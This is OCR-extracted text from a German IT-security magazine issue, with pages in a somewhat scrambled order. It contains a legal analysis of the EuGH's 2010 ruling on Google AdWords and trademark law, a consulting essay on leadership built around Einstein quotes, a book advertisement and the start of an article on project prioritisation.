Adwords beschäftigen die Rechtsexperten schon seit geraumer Zeit. Vor
den Gerichten streiten Unternehmen darüber, ob die Verwendung einer
fremden Marke als Adword eine Markenrechtsverletzung darstellt. Nun hat
der EuGH ein entscheidendes Urteil gefällt. Dazu gab es im Internet bereits
erste Kommentare – viele sind jedoch viel zu undifferenziert. Die IT-Recht
Kanzlei liefert detaillierte Informationen über das Urteil des EuGH: was hat
das Gericht gesagt und was bedeutet das Urteil für die Werbetreibenden?
In diesem Artikel erfahren Sie…
Was Sie vorher wissen sollten…
• Der Artikel setzt sich mit dem Urteil des EuGH zum Thema
Rechtmäßigkeit von Google-Adwords auseinander und zeigt
dabei auf, wie diese komplexe Entscheidung für die Werbepraxis zu verstehen ist
• Der Artikle ist selbsterklärend - ss kommt weniger auf die
Kenntnis des bisherigen rechtlichen Umgangs mit google Adwords, als vielmehr auf die zukünftige, rechtmäßige Nutzung
dieser Werbemöglichkeit an.
A
dabei gerade die spezifische Lotsenfunktion der Marke ausgenutzt würde.
Auch das OLG Stuttgart urteilte am 09.08.2007
(Aktenzeichen: 2 U 23/07), dass die Verwendung einer markenrechtlich geschützten Bezeichnung kennzeichenmäßig erfolgt und damit das Markenrecht
anwendbar ist, wenn die (fremde) Marke als sog. Keyword für eine “Google”-Adwords-Anzeige eingesetzt
werde.
Vor dem BGH ist das Verfahren des OLG Braunschweigs (s.o.) fortgeführt worden. Der BGH hat dabei entschieden (EuGH-Vorlage vom 22.01.2009,
Aktenzeichen: I ZR 125/07), dass das Verfahren ausgesetzt werden muss und die Frage dem Europäischen Gerichtshof vorzulegen ist. Dort ist das Verfahren zur Zeit immer noch anhängig, eine Entscheidung
steht bald an.
Nun hat sich der EuGH jedoch am 23.3.2010 in einem
ähnlich gelagerten, aus Frankreich an den EuGH herangetragenen Verfahren geäußert und somit die Richtung vorgegeben.
Lesen Sie zu diesem Thema auch den früheren Beitrag der IT-Recht Kanzlei.
Eine interessante, ganz grundlegende Frage ist
die nach der Entscheidungszuständigkeit des EuGH.
Warum durfte er darüber entscheiden? Ist das Markengesetz denn nicht eigentlich ein deutsches Gesetz, über das auch ein deutsches Gericht urteilen
müsste?
ls Adwords werden die Werbeanzeigen bezeichnet, die bei der Suche mit einer Internetsuchmaschine (z.B. Google) nicht innerhalb der
Trefferliste, sondern getrennt davon am rechten Bildschirmrand erscheinen (bei Google unter der Überschrift “Anzeigen”). Diese Adwords werden von Google
über ein Tool im Internet verkauft. Dabei kann sich der
Werbende bei der elektronischen Schaltung der Werbeanzeige die Begriffe (sog. „Keywords”) aussuchen,
bei deren Suche über die Suchmaschine die entsprechende Werbeanzeige angezeigt werden soll. Gleiches
gilt – je nach Wunsch und entsprechender Einstellung
bei der Schaltung der Werbeanzeige – für solche Suchbegriffe, die mit den angegebenen Keywords verwandt
oder diesen ähnlich sind.
Das LG Hamburg hat bereits am 30.03.2004 entschieden (Aktenzeichen: 312 O 910/03), dass die Verwendung eines markengeschützten Begriffs als Adword
keine Verletzung des Markenrechts darstellen würde,
da es an einer zeichenmäßigen Verwendung des Begriffs fehlen würde,
Allerdings haben andere Instanzgerichte dies auch
schon anders gesehen. So sah das OLG Braunschweig in seinem Urteil vom 12.07.2007 (Aktenzeichen: 2 U 24/07) in der Verwendung einer Marke als
Keyword eine markenmäßige Benutzung, die dem Inhaber des Markenrechts ermöglicht, nach dem Markengesetz gegen die Verwender der Marke vorzugehen. Als Begründung führte das Gericht aus, dass
30
3/2012
Das EuGH-Urteil – Google Adwords sind rechtmäßig!
Der EuGH muss nach Vorlage eines deutschen
Gerichts immer dann als letzte, oberste Instanz entscheiden, wenn eine (deutsche) Rechtsnorm, also ein
deutsches Gesetz wie das Markengesetz, auf Europäischem Recht basiert. Dies soll dazu führen, dass das
Recht in ganz Europa einheitlich angewendet wird und
bei Rechtsnormen, die gleichermaßen in Spanien, Italien und Deutschland (etc.) gelten, keine unterschiedlichen Maßstäbe angelegt werden. Das deutsche Markengesetz geht auf Europäisches Gemeinschaftsrecht
zurück, denn es basiert auf einer EG-Richtlinie, die dazu geführt hat, dass das Markenrecht in der gesamten
EU einheitlich ausgestaltet ist.
Daher war der EuGH in diesem Fall zuständig.
Wie hat der EuGH nun entschieden?
Die Entscheidungssätze des Urteils des EuGH (Urteil
vom 23.3.2010 – Az.: C-236/08 bis C-238/08) zum Thema Markenrecht und Google Adwords bzw. ähnliche
Werbedienste lauten wie im Folgenden dargestellt.
Im Anschluss an die wörtlichen Zitierungen der Entscheidungssätze des EuGH folgen einige informative
Anmerkungen, insbesondere zu den unterstrichenen
Begriffen:
1. Art. 5 Abs. 1 Buchst. a der Richtlinie 89/104 und
Art. 9 Abs. 1 Buchst. a der Verordnung Nr. 40/94
sind dahin auszulegen, dass der Inhaber einer Marke es einem Werbenden verbieten darf, auf ein
mit dieser Marke identisches Schlüsselwort, das
von diesem Werbenden ohne seine Zustimmung
im Rahmen eines Internetreferenzierungsdienstes ausgewählt wurde, für Waren oder Dienstleistungen, die mit den von der Marke erfassten identisch sind, zu werben, wenn aus dieser Werbung
für einen Durchschnittsinternetnutzer nicht oder nur
schwer zu erkennen ist, ob die in der Anzeige beworbenen Waren oder Dienstleistungen von dem
Inhaber der Marke oder einem mit ihm wirtschaftlich verbundenen Unternehmen oder vielmehr von
einem Dritten stammen.
2.Der Anbieter eines Internetreferenzierungsdienstes, der ein mit einer Marke identisches Zeichen als
Schlüsselwort speichert und dafür sorgt, dass auf
dieses Schlüsselwort Anzeigen gezeigt werden, benutzt dieses Zeichen nicht im Sinne von Art. 5 Abs.
1 der Richtlinie 89/104 bzw. Art. 9 Abs. 1 Buchst. a
und b der Verordnung Nr. 40/94.
3. Art. 14 der Richtlinie 2000/31/EG des Europäischen Parlaments und des Rates vom 8. Juni 2000
über bestimmte rechtliche Aspekte der Dienste der
Informationsgesellschaft, insbesondere des elektronischen Geschäftsverkehrs, im Binnenmarkt
(„Richtlinie über den elektronischen Geschäftsverkehr“) ist dahin auszulegen, dass die darin aufge-
hakin9.org/de
stellte Regel auf den Anbieter eines Internetreferenzierungsdienstes Anwendung findet, wenn dieser keine aktive Rolle gespielt hat, die ihm eine
Kenntnis der gespeicherten Daten oder eine Kontrolle über sie verschaffen konnte. Hat dieser Anbieter keine derartige Rolle gespielt, kann er für die
Daten, die er auf Anfrage eines Werbenden gespeichert hat, nicht zur Verantwortung gezogen werden, es sei denn, er hat die Informationen nicht unverzüglich entfernt oder den Zugang zu ihnen gesperrt, nachdem er von der Rechtswidrigkeit dieser Informationen oder Tätigkeiten des Werbenden
Kenntnis erlangt hat.
Zu Nr. 1:
Bei Punkt 1 geht es um das Verhältnis desjenigen, der
Inhaber einer bestimmten Marke ist, zu demjenigen,
der nicht Inhaber dieser Marke ist, diese aber bei einem Werbedienst wie Google Adwords als sog. Keyword (=Schlüsselwort) verwendet. Es stellt sich also
die Frage, ob derjenige, der z.B. die Taschentuchmarke „Tempo“ als Keyword bei Adwords verwendet, ohne
Inhaber dieser Marke zu sein, eine Markenrechtsverletzung gegenüber dem Inhaber der Marke „Tempo“
begeht.
(a) Verbot der Benutzung
Der EuGH hat in seinen Urteilsgründen ausgeführt,
dass jeder Werbende, der eine fremde Marke bei Google Adwords als sog. Schlüsselwort registriert, diese im
Sinne des Markenrechts benutzt. Dies alleine bedeute
jedoch noch nicht, dass zwangsläufig auch eine Markenrechtsverletzung vorliege. Vielmehr komme es weiter ebenso darauf an, dass eine der Funktionen der
Marke, insbesondere die sog. Herkunftsfunktion oder
auch die Werbefunktion der Marke durch diese Benutzung beeinträchtigt wird.
(b) Identisches Schlüsselwort
Markenrechtlich problematisch ist bei Werbediensten
wie Google Adwords an für sich nur der Fall, dass jemand, der nicht der entsprechende Markeninhaber ist,
eine fremde Marke genauso bei dem Werbedienst anmeldet, wie sie markenrechtlich registriert oder bekannt
ist. Handelt es sich lediglich um einen ähnlichen Begriff,
so liegt schon keine derart markenrechtlich problematische Benutzung der Marke und somit erst Recht keine
Markenrechtsverletzung vor.
(c) Ohne Zustimmung
Fast selbstverständlich ist es, dass keine Markenrechtsverletzung vorliegt, wenn der Markeninhaber mit der
Wahl der Marke als Schlüsselwort bei Google Adwords
durch den Werbenden einverstanden ist – beispielsweise weil dies die beiden vertraglich vereinbart haben.
31
IT-RECHT
(d) Internetreferenzierungsdienst
Der etwas hölzerne Begriff „Internetreferenzierungsdienst“ ist die Verallgemeinerung von Google Adwords.
Gemeint ist, dass nicht nur speziell der Werbedienst
Google Adwords von dem Urteil betroffen ist, sondern
eben alle Werbedienste, die auf diese Art und Weise
funktionieren. Es geht schlichtweg nicht nur um Google Adwords, sondern um derartige „Internetreferenzierungsdienste“ schlechthin.
(e) Identische Waren und Dienstleistungen
Markenrechtlich problematisch ist nach Ansicht des
EuGH nur der Fall, dass ein Unternehmen mit Waren
und Dienstleistungen wirbt oder handelt, die mit de-
32
nen des Markeninhabers identisch sind. Um bei dem
Beispiel „Tempo“ zu bleiben: wenn etwa ein anderer
Taschentücherhersteller, der seine Taschentücher
unter einer eigenen Marke vertreibt, bei Google Adwords den Begriff „Tempo“ als Schlüsselwort registrieren lässt, so liegen „identische Waren“ vor, nicht aber
wenn dies ein Elektronikgerätehersteller tut (warum
auch immer dieser das tun sollte).
(f) Bedingung: keine oder schwere Erkennbarkeit
Aber – und dies ist die wesentliche Aussage des EuGH in diesem Punkt – selbst die Registrierung der
identischen Marke als sog. Schlüsselwort bei Google
Adwords für identische Waren oder Dienstleistungen al-
3/2012
Das EuGH-Urteil – Google Adwords sind rechtmäßig!
leine stellt nach Meinung des EuGH noch keine Markenrechtsverletzung dar. Vielmehr kommt es stets auf den
Einzelfall an. Es geht im Kern immer darum, ob tatsächlich auch eine der Funktionen der Marke, insbesondere
die sog. Herkunftsfunktion oder auch die Werbefunktion
beeinträchtigt sind. Bei der Herkunftsfunktion geht es
darum, dass die Marke auf den Hersteller und somit auf
die (betriebliche) Herkunft eines entsprechenden Produkts hinweisen soll. Im Rahmen ihrer sog. Werbefunktion soll eine Marke dazu dienen, dass mit ihr im geschäftlichen Verkehr geworben werden kann, um z.B.
den Absatz der entsprechenden Waren zu fördern.
Eine Markenrechtsverletzung wegen Verletzung der
Herkunftsfunktion liegt nach Ansicht des EuGH nur dann
vor, wenn aufgrund der Gestaltung der entsprechenden Internetseite im Einzelfall dem durchschnittlichen
Internetnutzer der Eindruck entsteht, dass zwischen
dem wahren Markenrechtsinhaber und dem Verwender
der Marke bei Google Adwords, dessen Werbung bei
Google in der „Anzeigen“-Treffer-Liste in der Regel am
rechten Bildschirmrand angezeigt wird, eine irgendwie
geartete Verbindung besteht. Dies muss somit nun von
Fall zu Fall entschieden werden. Dies wiederum bedeutet, dass sich Unternehmen, die bei Google Adwords
fremde Marken als Schlüsselwörter registrieren, das Risiko eingehen und tragen müssen, dass sie von dem
Markenrechtsinhaber in Anspruch genommen werden
und dieser möglicherweise vor Gericht Recht gesprochen bekommt.
Hinsichtlich der Werbefunktion der Marke zieht der
EuGH eine klare Linie. Denn er urteilt, dass im Rahmen
der Benutzung oder Betreibung eines Internetreferenzierungsdienstes wie Google Adwords keine Verletzung
der Werbefunktion einer Marke liegen kann. In den Urteilsgründen führt der EuGH dazu aus, dass dadurch,
dass in aller Regel der Markenrechtsinhaber in der „natürlichen Trefferliste“ von Google (dem sog. „Suchergebnis“) unter den ersten Treffern lande, die Möglichkeit des Markeninhabers, mit seiner Marke zu werben,
in keiner Weise beeinträchtigt würde.
Zu Nr. 2:
Unter Punkt 2 stellt der EuGH fest, dass der Anbieter
eines Internetreferenzierungsdienstes, der wie Google
Adwords arbeitet (also auch Google Adwords selbst),
durch das Betreiben dieses Werbedienstes keine Markenrechtsverletzung begeht.
Allein daraus, dass etwa Google anderen Unternehmen im geschäftlichen Verkehr ermögliche, fremde
Marken als Schlüsselwörter zu registrieren, ergebe sich
noch keine Benutzung im Sinne des Markenrechts. Da
aber eine sog. „markenmäßige“ Benutzung stets eine
notwendige Bedingung dafür ist, dass auch eine Markenrechtsverletzung vorliegt, bewegt sich Google mit
seinem Werbedienst Google Adwords nicht einmal in
hakin9.org/de
der Nähe einer Markenrechtsverletzung. Das Unternehmen Google begeht mit seinem Dienst Google Adwords
somit keine Markenrechtsverletzung!
Zu Nr. 3:
Bei diesem Punkt geht es um die haftungsrechtliche
Verantwortlichkeit von Google für Google Adwords. Hier
stellte sich im Verfahren die Frage, ob Google permanent überprüfen, ob die Kunden, also diejenigen Unternehmen, die beim eigenen Werbedienst Google Adwords fremde Marken unberechtigt als Schlüsselwörter
(Keywords) anmelden, hierdurch Markenrechtsverletzungen begehen. Wäre dies der Fall, so müsste Google
einen derart hohen personellen und damit auch finanziellen Aufwand betreiben, um dieser Überprüfungspflicht
nachzukommen, dass das Betreiben des Werbedienstes erheblich teurer und damit vielleicht sogar faktisch
unmöglich geworden wäre.
Der EuGH hat in seinem Urteil jedoch entschieden,
dass eine bestimmte gesetzliche Vorschrift Anwendung
findet, wonach zu Gunsten von Google eine Haftungsprivilegierung gilt: erst dann, wenn Google von einer
Markenrechtsverletzung (etwa durch Anzeige des Markeninhabers) erfährt, muss Google tätig werden und die
mittels des eigenen Werbedienstes Google Adwords
begangene Markenrechtsverletzung unterbinden, indem es die Werbung von seiner Homepage nimmt.
Hätte der EuGH in diesem Punkt anders entschieden, so hätte Google jede einzelne Werbeanzeigen
„per Hand“ überprüfen müssen, bevor sie im Internet
erscheint.
Fazit
Der EuGH hat entschieden. Klarheit hat nun vor allem
Google hinsichtlich des eigenen Werbedienstes Google
Adwords: dieser verstößt nicht gegen das Markenrecht!
Anders sieht es bei den Unternehmen aus, die bei
Werbediensten wie Google Adwords fremde Marken als
Schlüsselwörter für eigene Produkte anmelden, die mit
denen des Inhabers der fremden Marke identisch sind:
hier muss nicht, kann aber nach Meinung des EuGH eine Markenrechtsverletzung gegeben sein – dies haben
im Einzelfall die Gerichte zu entscheiden. Hier gibt es
somit noch keine endgültige Rechtssicherheit! Man darf
in diesem Punkt also weiter gespannt sein.
Felix Barth
Rechtsanwalt und Fachanwalt für gewerblichen
Rechtsschutz Felix Barth, IT-Recht Kanzlei München, ist seit 2005 als Anwalt zugelassen und
hat sich im Laufe seiner Berufstätigkeit auf das
Urheber-, Marken- und Wettbewerbsrecht spezialisiert.
33
UNTERNEHMENSSICHERHEIT
Der Einstein-Code: Echte
Leader braucht das Land
Jürgen T. Knauf
Schlecker ist pleite, der Konkurrent dm – drogeriemarkt
– floriert. Und warum? Weil echter Erfolg nur möglich ist,
wenn man ganzheitlich denkt. Der Mensch macht den
Unterschied: keine Wertschöpfung ohne Wertschätzung!
In diesem Artikel erfahren Sie…
Was Sie vorher wissen sollten…
• Hier erfahren Sie, warum nur eine wertorientierte Unternehmenskultur nachhaltig ist und was man zwingend tun muss
um als Unternehmen und als Mensch zu überleben
• Kein spezielles Vorwissen
E
igentlich ist es immer das Gleiche: Da, wo
Menschen mit Überzeugung und Begeisterung ihre Sache vertreten, stellt sich der Erfolg von selbst ein. Also wäre es eigentlich logisch,
wenn der Mensch (Mitarbeiter, Dienstleister, Kunde)
im Mittelpunkt der Aufmerksamkeit stünde. Eigentlich … Doch die wenigsten Unternehmen und Manager hinterfragen ihr Tun und wagen den Schritt,
neue Wege zu gehen. Zum Beispiel auf das Potenzial ihrer Mitarbeiter zu setzen, ihnen zu vertrauen
und ihr Wohlergehen stärker in den Fokus zu rücken
– ein einfaches, aber wirkungsvolles Rezept für
den garantierten Erfolg. Stattdessen gilt die überholte Formel: schneller im Hamsterrad treten, höher
und weiter zielen – Business as usual. Keine Zeit,
kein Geld, keine Köpfe für neue Ideen und Konzepte. Wie geht es Ihnen? Nehmen Sie es einfach hin,
dass die Uhren immer schneller ticken, dass Sie
ständig mehr tun und immer weniger leben? Reflektieren Sie Ihr Handeln selbstkritisch und ändern
Sie die Dinge – mit Herz, Hand und Hirn? Wer mit
dem Strom schwimmt, eckt nicht an und dümpelt in
der Komfortzone weiter – bis zum großen Knall! Wo
sind sie nur, die Leader? Die Mutigen? Die Pioniere mit zeitgemäßen neuen Visionen? Bei Schlecker
saßen sie im letzten Jahrzehnt offensichtlich nicht
im Management, und leider müssen es nun die Mitarbeiter ausbaden. Albert Einstein resümierte lakonisch: „Jeder Idiot kann Dinge größer, komplexer
34
und gewaltiger machen. Es benötigt einen Hauch
von Genie und jede Menge Mut, um in die entgegengesetzte Richtung zu gehen.“
Mut: neue Wege gehen
Seit Jahren plädieren „gute Berater“ für einen Ansatz, der sich auf das Wohlergehen der Menschen
und der Unternehmen konzentriert, der alle entscheidenden Facetten des Erfolgscocktails berücksichtigt
und nicht bei den sogenannten harten Fakten aufhört: über den Tellerrand hinausblicken und auch mal
neue Wege einschlagen. Der SCOPAR-Ansatz der
360°-Beratung zielt auf einen nachhaltigen Nutzen
für das Unternehmen sowie dessen Kunden und Mitarbeiter – statt auf kurzfristige Gewinnmaximierung.
Gewinn und Erfolg stellen sich zwangsläufig ein,
wenn die handelnden Personen die Vorteile ihrer Verantwortungsbereiche vorn anstellen würden, statt die
eigenen Interessen im – starren – Blick zu haben ...
weil alle davon profitieren! P3: ein Ansatz, der Nachhaltigkeit auf sämtlichen Ebenen – People, Planet,
Profit – ernsthaft verfolgt und sich nicht nur auf den
Marketingeffekt reduziert.
Doch dies erfordert ein Umdenken in mehrere
Richtungen, Mut und Rückgrat. Interessanterweise
sind solche Konzepte derzeit überall im Gespräch,
aber dennoch wird nach den bewährten Rezepten
geköchelt: Reorganisation, Verschlankung, Personalabbau, bessere/neue IT etc., zubereitet von den
3/2012
Der Einstein-Code: Echte Leader braucht das Land
immer gleichen Dienstleistern. Weil es bequem und
sicher ist, obwohl laut manager magazin 8/2011 nur
57 % der Kunden mit den Leistungen der Berater
zufrieden sind. Doch Veränderungen erzeugen Unsicherheit und Ängste – der Mensch ist ein Gewohnheitstier. Albert Einstein sah das wohl ähnlich: „Die
Definition von Wahnsinn ist, immer wieder das
Gleiche zu tun und andere Ergebnisse zu erwarten.“
Veränderung beginnt im Kleinen – bei sich selbst!
Hand aufs Herz: Wo waren Sie im letzten Jahr mutig: Haben Sie wirklich etwas gewagt, haben Sie
neue Ansätze ausprobiert? Stehen die Mitarbeiter
und der Nutzen Ihrer Aktivitäten fürs Unternehmen
im Mittelpunkt Ihres Handelns? Beantworten Sie
diese Fragen ehrlich und reflektieren Sie darüber
offen und selbstkritisch. Erst dann sollten Sie handeln. Wie? Indem Sie mehr „auf Ihren Bauch hören“, der Intuition folgen und die ausgetrampelten
Pfade verlassen. Vielleicht zweifeln Sie ja daran,
den Erfolgskurs Ihres Unternehmens von der inneren Stimme navigieren zu lassen? Auch hier hat Albert Einstein wieder ein Quäntchen Weisheit zu
bieten: „Der Intellekt hat ein scharfes Auge für
Methoden und Werkzeuge, aber er ist blind gegen Ziele und Werte.“
Intuition: dem Bauchgefühl folgen
Keine Sorge: Dem Bauchgefühl zu folgen bedeutet nicht, den Verstand auszuschalten. Wir verfügen
über gute Systeme, Methoden und Werkzeuge, die
wir nutzen sollten – aber sie dürfen uns nicht beherrschen. Der Mix macht´s. Wer von uns hat nicht
schon Entscheidungen getroffen, obwohl es sonnenklar war, dass es die falschen sind? Warum folgen
wir nicht öfter unserem inneren Kompass? Aus Angst
anzuecken oder etwas zu verlieren? Aus Angst vor
dem Ungewissen? Aus Angst, es könnte dem eigenen Vorteil schaden oder jemandem auf den Schlips
zu treten? Ist es die Angst vor einer steinigen und
unbequemen Wegstrecke? Vermutlich gibt Ihre innere Stimme zumindest den klugen Zitaten Albert Einsteins recht. Doch eine andere, lautere und sehr vertraute Stimme raunt: „Prinzipiell stimmt das ja alles:
Aber was kann ich allein bewirken … da müssten die
anderen schon mitziehen. Das ist in unserer Firma
ein Kampf gegen Windmühlen. Ach, das ist alles so
ein idealisierter Quatsch, das mit dem Umdenken
und den neuen Wegen … Geht doch gar nicht: Wir
hängen in Systemen, Strukturen und Abläufen fest –
die kann man nicht so einfach ändern.“ Welche Ihrer Stimmen ist die lautere? Welcher Stimme folgen
Sie? Albert Einstein wusste: „Der intuitive Geist
ist ein heiliges Geschenk und der rationale Geist
ein treuer Diener. Wir haben eine Gesellschaft er-
hakin9.org/de
schaffen, die den Diener ehrt und das Geschenk
vergessen hat.“
Wandel: gelebte Werte
machen den Unterschied
Folgen Sie Ihrer – vielleicht anfangs leiseren – inneren Stimme: Ihrer Intuition. Gehen Sie den Weg des
Herzens, vertrauen Sie Ihrem Kompass und sprechen Sie die Dinge an, die Sie stören – jetzt! Seien
Sie offen und mutig: Sie werden eine positive Resonanz erhalten. Expect the unexpectable!
Ändern Sie alte Muster und fokussieren Sie folgende
drei Punkte:
• Nachhaltiger Nutzen aller Aktivitäten, Produkte und
Services – mit Blick fürs Ganze
• Wertebasiertes Handeln und mehr Menschlichkeit
auf allen Ebenen
• Mehr Bauchgefühl und Authentizität – das Gesagte
„leben“
Es reicht nicht, andere Modelle zu kopieren. Schlecker ist daran gescheitert, mit alten Shop-Konzepten,
SCOPAR – Scientfic Consulting Partners
100 % der Kunden empfehlen SCOPAR weiter!
SCOPAR bietet ganzheitliche und wissenschaftlich fundierte Beratung, Coaching, Moderation, Gutachten sowie
Strategie, Konzeption und Umsetzung aus einer Hand an –
neutral, pragmatisch und nutzenorientiert. Das Team von
SCOPAR setzt sich zusammen aus erfahrenen Managern, renommierten Wissenschaftlern und exzellenten Beratern.
Die enge Einbindung der Wissenschaft in unsere Projekte
führt zu einem Know-how-Vorsprung von ca. zwei bis drei
Jahren, von dem die Kunden direkt profitieren. SCOPAR-Beratungsfokus:
• Strategie-/Management-Consulting: Strategie-, Organisationsentwicklung, Turnaround, SCM – Supply Chain
Management, Prozessoptimierung, Marktanalysen, Vertrieb, Marketing, Kundenbefragung, Controlling – BSC/
KPI, CRM – Customer Relationship Management, CVM –
Customer Value Management, Innovations- und Technologiemanagement ...
• IT-Consulting: Strategie, Governance, Business Alignment und Kundenmanagement, Portfolio- und Servicemanagement, Sourcing, Technologiereviews, IT-Controlling und Leistungsverrechnung, IT-Optimierung (Infrastruktur, Applikationen und Betrieb), Toolauswahl
und -implementierung, Datenqualität, SW-Engineering
(Strategien, Methoden, Prozesse, Werkzeuge) ...
• Human-Resources-Consulting:
Personalentwicklung, Steigerung der Leistungsbereitschaft, -fähigkeit
und -möglichkeit, Führungskräftecoaching, Einzel- und
Gruppencoaching, Mitarbeiterbefragung, Leistungsmessung und leistungsorientierte Vergütung, Optimierung aller Personalprozesse, Assessment, 360°-Feedback,
Employer Branding, Demografischer Wandel, Gesundheitsmanagement, H2B-Strategie (health2business©) ...
35
überholten Methoden und eingeschüchterten Mitarbeitern Land zu gewinnen. Wenn die innere Struktur nicht
stimmt, helfen Durchhalteparolen wie „Weiter so!“ oder
die bunten Pflaster neuer Shop-Konzepte und Werbemaßnahmen nicht. Umdenken – Kurswechsel – Handeln: „Amateurs talk about it, professionals do it!“
Welche Werte haben Sie? Handeln Sie nach diesen
Werten? Passen Ihre eigenen Wertvorstellungen zu
denen Ihres Unternehmens? Plan B(etter): love it,
change it or leave it!
Handeln: jetzt!
Wenn Sie die Lektüre nun mit „interessant“ oder „hm …
stimmt schon, aber …“ kommentieren und dann beiseite legen, hätten Sie sich die Zeit auch anders vertreiben
können. Wenn Sie jedoch den Impuls verspüren, endlich zu handeln, dann fangen sie an – und zwar jetzt!
Wie? Notieren Sie sich die drei Punkte in Ihrem Leben,
die sie am meisten stören – privat und beruflich. Schreiben Sie jeweils dazu, was Sie ändern wollen – und handeln Sie entsprechend. Gehen Sie neue Wege – Sie
werden den Mühlen des Alltags entkommen, mehr Lebensfreude gewinnen, erfolgreicher sein und Ihre Ziele schneller und einfacher erreichen. Aber Sie müssen
handeln! Denn: „Wer nicht mit der Zeit geht, der geht
mit der Zeit“. Albert Einstein würde es drastischer formulieren: „Wir haben nur noch furchtbar wenig Zeit.
Wenn wir überhaupt wollen, dann müssen wir jetzt
handeln.“
Weitere 30 Maßnahmen finden Sie in einer SCOPARStudie von 2011 unter http://www.scopar.de/download/
scopar-zukunftsstudie-2011.pdf
Jürgen T. Knauf (Dipl.-Ing.,
Dipl.-Wirtschaftsing.)
Herr Knauf studierte Elektrotechnik mit
Schwerpunkt Informationstechnik und war
u. a. als Entwicklungsingenieur für die Porsche AG tätig, bevor er Wirtschaftsingenieurwesen mit Schwerpunkt Maschinenbau studierte. Herr Knauf ist einer der wenigen wirklichen Generalisten und Visionäre. Er arbeitet seit Mitte der 90er-Jahre eng mit Wissenschaftlern zusammen und ist als Unternehmensberater für das Top-Management tätig. Um Projektziele erfolgreich, effizient und nachhaltig zu erreichen, arbeitet Herr Knauf konsequent nutzenorientiert, pflegt eine offene Kommunikation, denkt und handelt
ganzheitlich.
Da der Mensch der entscheidende Erfolgsfaktor ist, ist Herr
Knauf ein Vertreter der partizipativen Beratung. Die Gründungen von SCOPAR – Scientific Consulting Partners im Jahre 2005 und SCOPAR HEALTH im Jahre 2007 sind eine logische
Konsequenz seiner grundsätzlichen Ausrichtung und persönlichen Überzeugung von Ganzheitlichkeit, Nachhaltigkeit und
Menschlichkeit.
36
3/2012
Linux-Server
815 S., 2011, 49,90 €
» www.GalileoComputing.de/2205
Debian GNU/Linux
786 S., 4. Auflage 2011, mit DVD, 39,90 €
» www.GalileoDesign.de/2510
Linux Hochverfügbarkeit
454 S., 2011, 49,90 €
» www.GalileoComputing.de/1999
Praxiswissen für Administratoren
www.GalileoComputing.de
Windows 7 für Administratoren
VMware vSphere 4
804 S., 2010, 49,90 €
» www.GalileoComputing.de/2242
1052 S., 2010, 89,90 €
» www.GalileoComputing.de/2179
Windows Server 2008 R2
1410 S., 3. Auflage 2010, 59,90 €
» www.GalileoComputing.de/2286
Citrix XenApp 6 und XenDesktop 5
608 S., 4. Auflage 2011, 59,90 €
» www.GalileoComputing.de/2465
Ihre IT-Bibliothek
» www.facebook.com/GalileoPressVerlag
» www.twitter.com/Galileo_Press
Wissen, wie’s geht.
UNTERNEHMENSSICHERHEIT
Maßnahmen konsequent am Wertbeitrag
für das Unternehmen ausrichten
Die richtige Priorisierung schafft Wettbewerbsvorteile
und erleichtert das Tagesgeschäft
Prof. Dr. Rudolf Dögl und Michael Jost
Um eine Ausrichtung der Maßnahmen auf die Strategie und eine
Vergleichbarkeit zu erreichen, ist eine standardisierte Methode sowie eine
eindeutige Bewertungsgrundlage Voraussetzung. Dabei ist es wichtig,
typische Fehler zu vermeiden: Eine reine Kostenbetrachtung (ROI), bei
der andere unternehmenskritische Aspekte (Passung zur Strategie, Zeit,
Qualität, Kundennutzen, Wettbewerb…) außen vor bleiben.
In diesem Artikel erfahren Sie…
Was Sie vorher wissen sollten…
• Hier erfahren Sie, warum eine Projektpriorisierung erfolgsentscheidend ist und wie ein ganzheitliches Portfoliomanagement aufgebaut ist.
• Kein spezielles Vorwissen
E
ine Verdichtung auf eine Kennzahl eliminiert das
unternehmerisches „Gefühl“, Erfahrungen fließen nicht mit ein.
Eine zu komplexe Methode / Tool führt zu einem zu
hohen Bewertungsaufwand. Durch eine „Echtzeit-Erstellung“ von Entscheidungsgrundlagen spart man viel
Zeit und sonst so hohen Bearbeitungsaufwand. Ein partizipativer Ansatz führt dabei zu einer durchgängigen
Akzeptanz der Methode.
Eine systematische Ausrichtung von Maßnahmen
auf die Unternehmensstrategie erhöht den operativen
Gewinn nachhaltig. Eine Toolunterstützung steigert
die Transparenz und Effizienz des gesamten Priorisierungsprozesses.
Kritische Erfolgsfaktoren und typische Fragen der
richtigen Projekt-Priorisierung
Maßnahmen konsequent am Wertbeitrag für das Unternehmen ausrichten
Hätten Sie vor 10 Jahren in die Idee eines Mitarbeiters Geld investiert, der Handy-Klingeltöne gegen Gebühr zum Download anbieten wollte? Nein?
Schade, Sie wären ganz vorne mit dabei gewesen
und hätten vermutlich viel Geld verdient! Der Markt
für Klingeltöne wird weltweit auf mehrere Milliarden
Euro Umsatz geschätzt.
Die richtige Maßnahme und Projekte zur richtigen
Zeit zu starten, eine Chance zu erkennen und beim
Schopf zu packen ist eine Kunst. Ausgefeilte Business-Cases und ROI-Betrachtungen führen oft nicht
38
zu unternehmerischen Erfolg - – ganz zur großen
Verwunderung der Beteiligten. Eine Priorisierung, die
ausschließlich nach messbaren und monetären Kriterien und ohne strategischen „Weitblick“ erfolgt ist
extrem kritisch. Wunsch und Wirklichkeit klaffen oft
weit auseinander, wenn „weiche“ Aspekte wie „Kundenähe“, „Prozessoptimierung“, „Lieferantentreue“,
„Marktwirkung“ etc. angemessen berücksichtigt werden sollen. Und gerade diese Faktoren entscheiden
darüber ob eine Maßnahme richtig zieht, „nur“ erfolgreich ist oder floppt. Und gerade diese Kriterien finden, neben den zählbaren Dingen, bei einer guten
Methodik zur Projektpriorisierung angemessene Berücksichtigung.
Die richtige Entscheidung treffen
Eine systematische, transparente und strategischen
Bewertung und Priorisierung von Maßnahmen erhöhte
3/2012
Maßnahmen konsequent am Wertbeitrag für das Unternehmen ausrichten
Akzeptanz, spart Zeit und Geld und ist essentiell für den
Erfolg – insb. vor dem Hintergrund begrenzter Ressourcen. Wichtig sind die methodische Auseinandersetzung
mit den tatsächlichen Erfolgsperspektiven von Maßnahmen und die Transparenz über monetäre und qualitative Nutzenbeiträge.
Ein Portfoliomanagement, das die Strategie des Unternehmens trägt, die Kosten-, Qualitäts-, Zeit-, Flexibilitäts-, Markt- und Wettbewerbsaspekte berücksichtigt, erleichtert die Entscheidungen und vermindert die
Gefahr von Fehlinvestitionen. Es gibt zudem einen generellen Anstoß zum Überprüfen der Maßnahmen - so
z.B. zum Aufdecken von „Alibiprojekten“ oder „Gewohnheitsprojekten“..
Wertbeitragsorientierte Priorisierung
